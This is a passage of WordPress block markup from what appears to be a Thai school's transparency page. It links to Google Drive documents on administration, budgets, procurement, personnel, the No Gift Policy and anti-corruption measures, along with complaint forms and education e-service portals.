{\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 